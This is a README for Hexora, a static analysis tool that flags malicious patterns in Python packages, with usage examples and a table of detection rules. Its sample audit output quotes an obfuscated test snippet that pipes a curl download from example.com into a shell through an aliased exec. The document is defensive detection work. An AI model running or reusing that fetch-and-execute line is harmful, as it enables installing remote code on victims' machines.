Hexora is a static analysis tool designed to detect malicious and harmful patterns in Python code.

It can be used to:

• Audit project dependencies to catch potential supply-chain attacks
• Detect malicious scripts found on platforms like Pastebin, GitHub, or open directories
• Analyze IoC files from past security incidents
• Audit new packages uploaded to PyPi.

Examples

For output examples, please see docs/examples.md file.

Installation

Using Python

Requires Python 3.9+.

pip install hexora

Using uv:

uv tool install hexora

Usage

hexora --help

Audit single file

>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

Audit directory

hexora audit --output-format terminal resources/test/

Audit packages from virtual environment

hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

Where python3.11 is the version of the Python in virtual environment.

Tips:

• Use --exclude to suppress certain rule codes (e.g., noisy imports) for a given run
• Use --min-confidence to focus on high-confidence findings only.

Confidence indicates how a certain piece of code is malicious. Some libraries or code snippets are used for legit purposes, and it's hard to distinguish legit use-cases from malicious ones. That's why some matches have a low confidence level.

Some rules can have different confidence levels. Avoid filtering a lot of rules by codes unless you are very confident. For example, code and shell execution can have medium, high, and very high confidence. This depends on how the code was executed. If we detect an obfuscation attempt, we elevate confidence.

For example, this code will have a high confidence:

globals()["__builtins__"].eval("print(123)")

Usage in Python

>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

Testing Against Malicious Dataset

When developing new rules, you can use existing malicious datasets such as malicious-software-packages-dataset.

After cloning, point the benchmarking tool to the dataset directory:

cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

Available rules

New rules are added regularly.

Right now, the following rules are available:

Code	Name	Description
HX1000	AppEnumeration	Suspicious application enumeration.
HX1010	BrowserEnumeration	Suspicious browser enumeration (apps, cookies, history, etc.).
HX1020	PathEnumeration	Suspicious path enumeration.
HX1030	OSFingerprint	Suspicious OS fingerprinting.
HX2000	ClipboardRead	Reading from the clipboard.
HX2010	EnvAccess	Access to a sensitive environment variable.
HX2020	ScreenshotCapture	Capturing screenshots from the display.
HX3000	CodeExec	Possible code execution.
HX3010	ShellExec	Execution of a shell command.
HX3040	DLLInjection	Possible DLL injection.
HX3050	DangerousExec	Execution of potentially dangerous command inside a shell command.
HX3060	SuspiciousCall	Suspicious function call.
HX4000	ObfuscatedShellExec	Execution of an obfuscated shell command.
HX4010	ObfuscatedCodeExec	Execution of obfuscated code.
HX5000	DunderImport	Suspicious use of __import__.
HX5010	SuspiciousImport	Suspicious import.
HX5020	CtypesImport	Suspicious ctypes import.
HX5030	PickleImport	Suspicious pickle import.
HX5040	StructImport	Suspicious struct import.
HX5050	SocketImport	Suspicious socket import.
HX5060	MarshalImport	Suspicious marshal import.
HX6000	Base64String	Long Base64-encoded string detected; possible code obfuscation.
HX6010	HexedLiterals	List of hex-encoded literals detected; possible payload.
HX6020	HexedString	Long hex-encoded string detected; possible payload.
HX6030	IntLiterals	Large list of integer literals detected; possible code obfuscation.
HX6040	CVEInLiteral	Literal contains a CVE identifier.
HX6050	SuspiciousLiteral	Suspicious literal detected; possible data enumeration.
HX6060	PathTraversal	Suspicious path traversal.
HX6070	BrowserExtension	Enumeration of sensitive browser extensions.
HX6080	WebHook	Suspicious webhook detected. Possible data exfiltration.
HX7000	SuspiciousFunctionName	Suspicious function name.
HX7010	SuspiciousParameterName	Suspicious parameter name.
HX7020	SuspiciousVariable	Suspicious variable name.
HX9000	DataExfiltration	Potential data exfiltration.
HX8000	BinaryDownload	Suspicious binary download.
HX8010	BuiltinsVariable	Suspicious builtin variable usage.
HX8020	SuspiciousComment	Suspicious comment.
HX8030	SuspiciousWrite	Suspicious write to the filesystem.

Credits

For parsing, we use AST parser from ruff library.